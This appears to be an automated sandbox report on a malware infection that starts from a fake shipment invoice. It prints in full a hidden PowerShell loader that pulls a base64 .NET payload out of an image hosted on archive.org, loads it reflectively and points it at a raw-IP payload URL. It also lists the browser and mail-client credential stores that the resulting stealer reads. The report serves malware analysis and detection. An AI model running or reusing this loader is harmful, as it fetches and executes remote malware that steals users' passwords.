?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fcbr/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fcbr/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                Source: RegAsm.exe, 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager August Shipment - Inv No. 041 [Compatibility Mode]
                Source: RegAsm.exe, 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: RegAsm.exe, 0000000E.00000002.997584693.0000000000961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers-win-c
                Source: RegAsm.exe, 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.997584693.0000000000944000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434CB6 cpuid 14_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,14_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,14_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004489D7 GetSystemTimeAsFileTime,14_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B69E GetComputerNameExW,GetUserNameW,14_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00449210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040BA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db14_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword16_2_004033F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3412, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JAJump to behavior
